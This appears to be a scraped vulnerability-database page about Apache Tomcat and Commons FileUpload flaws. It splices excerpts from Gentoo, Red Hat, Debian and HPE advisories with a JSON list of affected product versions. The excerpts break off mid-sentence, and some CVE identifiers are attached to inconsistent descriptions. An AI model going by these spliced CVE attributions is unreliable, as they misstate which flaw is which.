3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Gentoo Linux Security Advisory GLSA 201705-09
https://security.gentoo.org/
Severity: High Title: Apache Tomcat: Multiple vulnerabilities Date: May 18, 2017 Bugs: #575796, #586966, #595978, #615868 ID: 201705-09
Synopsis
Multiple vulnerabilities have been found in Apache Tomcat, the worst of which could lead to privilege escalation. Please review the CVE identifiers referenced below for details.
A local attacker, who is a tomcat's system user or belongs to tomcat=E2=80= =99s group, could potentially escalate privileges.
Workaround
There is no known workaround at this time.
Resolution
All Apache Tomcat users have to manually check their Tomcat runscripts to make sure that they don't use an old, vulnerable runscript. In addition:
All Apache Tomcat 7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/tomcat-7.0.70:7"
All Apache Tomcat 8 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/tomcat-8.0.36:8"
References
[ 1 ] CVE-2015-5174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5174 [ 2 ] CVE-2015-5345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5345 [ 3 ] CVE-2015-5346 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5346 [ 4 ] CVE-2015-5351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5351 [ 5 ] CVE-2016-0706 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0706 [ 6 ] CVE-2016-0714 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0714 [ 7 ] CVE-2016-0763 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0763 [ 8 ] CVE-2016-1240 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1240 [ 9 ] CVE-2016-3092 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3092 [ 10 ] CVE-2016-8745 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8745 [ 11 ] CVE-2017-5647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5647 [ 12 ] CVE-2017-5648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5648 [ 13 ] CVE-2017-5650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5650 [ 14 ] CVE-2017-5651 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5651
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201705-09
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--SKKBd9VlC8wusCVbXKC9aaUtloHAjIa1g--
. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
Security Fix(es):
-
It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240)
-
It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. (CVE-2016-6325)
-
The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance. (CVE-2016-3092)
-
It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other then their own. (CVE-2016-6816)
-
A bug was discovered in the error handling of the send file code for the NIO HTTP connector. This led to the current Processor object being added to the Processor cache multiple times allowing information leakage between requests including, and not limited to, session ID and the response body. (CVE-2016-8745)
-
The Realm implementations did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder. (CVE-2016-5018)
-
It was discovered that when a SecurityManager is configured Tomcat's system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible. (CVE-2016-6794)
-
It was discovered that a malicious web application could bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. These packages provide a number of enhancements over the previous version of Red Hat JBoss Web Server.
Users of Red Hat JBoss Web Server are advised to upgrade to these updated packages, which add this enhancement. Solution:
Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: tomcat security, bug fix, and enhancement update Advisory ID: RHSA-2016:2599-02 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2599.html Issue date: 2016-11-03 CVE Names: CVE-2015-5174 CVE-2015-5345 CVE-2015-5351 CVE-2016-0706 CVE-2016-0714 CVE-2016-0763 CVE-2016-3092 =====================================================================
- Summary:
An update for tomcat is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch Red Hat Enterprise Linux Client Optional (v. 7) - noarch Red Hat Enterprise Linux ComputeNode (v. 7) - noarch Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Enterprise Linux Server Optional (v. 7) - noarch Red Hat Enterprise Linux Workstation (v. 7) - noarch Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch
- Description:
Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.
The following packages have been upgraded to a newer upstream version: tomcat (7.0.69). (BZ#1287928)
Security Fix(es):
-
A CSRF flaw was found in Tomcat's the index pages for the Manager and Host Manager applications. These applications included a valid CSRF token when issuing a redirect as a result of an unauthenticated request to the root of the web application. This token could then be used by an attacker to perform a CSRF attack. (CVE-2015-5351)
-
It was found that several Tomcat session persistence mechanisms could allow a remote, authenticated user to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that placed a crafted object in a session. (CVE-2016-0714)
-
A security manager bypass flaw was found in Tomcat that could allow remote, authenticated users to access arbitrary application data, potentially resulting in a denial of service. (CVE-2016-0763)
-
A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long. (CVE-2016-3092)
-
A directory traversal flaw was found in Tomcat's RequestUtil.java. A remote, authenticated user could use this flaw to bypass intended SecurityManager restrictions and list a parent directory via a '/..' in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call. (CVE-2015-5174)
-
It was found that Tomcat could reveal the presence of a directory even when that directory was protected by a security constraint. A user could make a request to a directory via a URL not ending with a slash and, depending on whether Tomcat redirected that request, could confirm whether that directory existed. (CVE-2015-5345)
-
It was found that Tomcat allowed the StatusManagerServlet to be loaded by a web application when a security manager was configured. This allowed a web application to list all deployed web applications and expose sensitive information such as session IDs. (CVE-2016-0706)
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1133070 - Need to include full implementation of tomcat-juli.jar and tomcat-juli-adapters.jar 1201409 - Fix the broken tomcat-jsvc service unit 1208402 - Mark web.xml in tomcat-admin-webapps as config file 1221896 - tomcat.service loads /etc/sysconfig/tomcat without shell expansion 1229476 - Tomcat startup ONLY options 1240279 - The command tomcat-digest doesn't work with RHEL 7 1265698 - CVE-2015-5174 tomcat: URL Normalization issue 1277197 - tomcat user has non-existing default shell set 1287928 - Rebase tomcat to 7.0.69 or backport features 1311076 - CVE-2015-5351 tomcat: CSRF token leak 1311082 - CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms 1311087 - CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet 1311089 - CVE-2015-5345 tomcat: directory disclosure 1311093 - CVE-2016-0763 tomcat: security manager bypass via setGlobalContext() 1311622 - Getting NoSuchElementException while handling attributes with empty string value in tomcat 7.0.54 1320853 - Add HSTS support 1327326 - rpm -V tomcat fails on /var/log/tomcat/catalina.out 1347774 - The security manager doesn't work correctly (JSPs cannot be compiled) 1347860 - The systemd service unit does not allow tomcat to shut down gracefully 1349468 - CVE-2016-3092 tomcat: Usage of vulnerable FileUpload package can result in denial of service
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: tomcat-7.0.69-10.el7.src.rpm
noarch: tomcat-servlet-3.0-api-7.0.69-10.el7.noarch.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: tomcat-7.0.69-10.el7.noarch.rpm tomcat-admin-webapps-7.0.69-10.el7.noarch.rpm tomcat-docs-webapp-7.0.69-10.el7.noarch.rpm tomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-javadoc-7.0.69-10.el7.noarch.rpm tomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-jsvc-7.0.69-10.el7.noarch.rpm tomcat-lib-7.0.69-10.el7.noarch.rpm tomcat-webapps-7.0.69-10.el7.noarch.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: tomcat-7.0.69-10.el7.src.rpm
noarch: tomcat-servlet-3.0-api-7.0.69-10.el7.noarch.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: tomcat-7.0.69-10.el7.noarch.rpm tomcat-admin-webapps-7.0.69-10.el7.noarch.rpm tomcat-docs-webapp-7.0.69-10.el7.noarch.rpm tomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-javadoc-7.0.69-10.el7.noarch.rpm tomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-jsvc-7.0.69-10.el7.noarch.rpm tomcat-lib-7.0.69-10.el7.noarch.rpm tomcat-webapps-7.0.69-10.el7.noarch.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: tomcat-7.0.69-10.el7.src.rpm
noarch: tomcat-7.0.69-10.el7.noarch.rpm tomcat-admin-webapps-7.0.69-10.el7.noarch.rpm tomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-lib-7.0.69-10.el7.noarch.rpm tomcat-servlet-3.0-api-7.0.69-10.el7.noarch.rpm tomcat-webapps-7.0.69-10.el7.noarch.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: tomcat-7.0.69-10.el7.noarch.rpm tomcat-admin-webapps-7.0.69-10.el7.noarch.rpm tomcat-docs-webapp-7.0.69-10.el7.noarch.rpm tomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-javadoc-7.0.69-10.el7.noarch.rpm tomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-jsvc-7.0.69-10.el7.noarch.rpm tomcat-lib-7.0.69-10.el7.noarch.rpm tomcat-webapps-7.0.69-10.el7.noarch.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: tomcat-7.0.69-10.el7.src.rpm
noarch: tomcat-7.0.69-10.el7.noarch.rpm tomcat-admin-webapps-7.0.69-10.el7.noarch.rpm tomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm tomcat-lib-7.0.69-10.el7.noarch.rpm tomcat-servlet-3.0-api-7.0.69-10.el7.noarch.rpm tomcat-webapps-7.0.69-10.el7.noarch.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: tomcat-docs-webapp-7.0.69-10.el7.noarch.rpm tomcat-javadoc-7.0.69-10.el7.noarch.rpm tomcat-jsvc-7.0.69-10.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-5174 https://access.redhat.com/security/cve/CVE-2015-5345 https://access.redhat.com/security/cve/CVE-2015-5351 https://access.redhat.com/security/cve/CVE-2016-0706 https://access.redhat.com/security/cve/CVE-2016-0714 https://access.redhat.com/security/cve/CVE-2016-0763 https://access.redhat.com/security/cve/CVE-2016-3092 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.3_Release_Notes/index.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFYGv0mXlSAg2UNWIIRAq74AJ9mIwnepxw2jbrHnfK3Gkc+N7uMIACfXM+E 5lVH/+qu5TZIB819MY4FTO0= =u+za -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . A remote attacker can take advantage of this flaw by sending file upload requests that cause the HTTP server using the Apache Commons Fileupload library to become unresponsive, preventing the server from servicing other requests.
For the stable distribution (jessie), this problem has been fixed in version 1.3.1-1+deb8u1.
For the testing distribution (stretch), this problem has been fixed in version 1.3.2-1.
For the unstable distribution (sid), this problem has been fixed in version 1.3.2-1.
We recommend that you upgrade your libcommons-fileupload-java packages. It contains security fixes for the Tomcat 7 component. Only users of the Tomcat 7 component in JBoss Web Server need to apply the fixes delivered in this release. (CVE-2016-3092)
-
A session fixation flaw was found in the way Tomcat recycled the requestedSessionSSL field. If at least one web application was configured to use the SSL session ID as the HTTP session ID, an attacker could reuse a previously used session ID for further requests. (CVE-2016-0706)
-
References:
https://access.redhat.com/security/cve/CVE-2015-5346 https://access.redhat.com/security/cve/CVE-2015-5351 https://access.redhat.com/security/cve/CVE-2016-0706 https://access.redhat.com/security/cve/CVE-2016-0714 https://access.redhat.com/security/cve/CVE-2016-0763 https://access.redhat.com/security/cve/CVE-2016-3092 Security Impact: https://access.redhat.com/security/updates/classification/#important
- It includes bug fixes and enhancements. The JBoss server process must be restarted for the update to take effect. (CVE-2016-3092)
4
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201607-0321",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.14"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.69"
},
{
"model": "icewall identity manager",
"scope": "eq",
"trust": 1.3,
"vendor": "hp",
"version": "5.0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.11"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.67"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.27"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.23"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.5"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.25"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.10"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.5.0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.3"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.40"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.35"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.30"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.39"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.22"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.35"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.12"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.16"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.1"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.47"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.1"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.8"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.42"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.33"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.54"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.50"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.55"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.21"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.26"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.28"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.4"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.68"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.15"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.34"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.57"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.19"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.53"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.32"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.65"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.5.2"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.17"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.20"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.8"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.33"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.5"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.59"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.30"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.6"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.27"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.29"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.2"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "8.0.32"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.41"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "7.0.37"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.28"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.29"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.21"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.22"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "9.0.0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "7.0.52"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.18"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "7.0.56"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.12"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "7.0.64"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.20"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "15.10"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "7.0.63"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.11"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.24"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "7.0.0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "7.0.61"
},
{
"model": "commons fileupload",
"scope": "lte",
"trust": 1.0,
"vendor": "apache",
"version": "1.3.1"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.23"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.26"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "8.0.14"
},
{
"model": "icewall sso agent option",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "10.0"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "7.0.62"
},
{
"model": "struts",
"scope": "lte",
"trust": 0.8,
"vendor": "apache",
"version": "2.5.x"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.8,
"vendor": "apache",
"version": "7.0.0 to 7.0.69"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.8,
"vendor": "apache",
"version": "8.0.0.rc1 to 8.0.35"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.8,
"vendor": "apache",
"version": "8.5.0 to 8.5.2"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.8,
"vendor": "apache",
"version": "9.0.0.m1 to 9.0.0m6"
},
{
"model": "commons fileupload",
"scope": "eq",
"trust": 0.8,
"vendor": "apache",
"version": "1.2 to 1.2.2"
},
{
"model": "commons fileupload",
"scope": "eq",
"trust": 0.8,
"vendor": "apache",
"version": "1.3 to 1.3.1"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.10"
},
{
"model": "jg748aae hp imc ent sw plat w/ nodes e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "500"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.17"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.12"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.3.0"
},
{
"model": "interact",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.3"
},
{
"model": "marketing operations",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2.1"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.2.0"
},
{
"model": "jg550aae hp pmm to imc bsc wlm upgr w/150ap e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.6"
},
{
"model": "interact",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.36"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.9"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.029"
},
{
"model": "commons fileupload",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "1.3.2"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.7"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.10"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.0.1"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.0.4"
},
{
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.6.0"
},
{
"model": "websphere application server liberty profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "0"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.5"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.5"
},
{
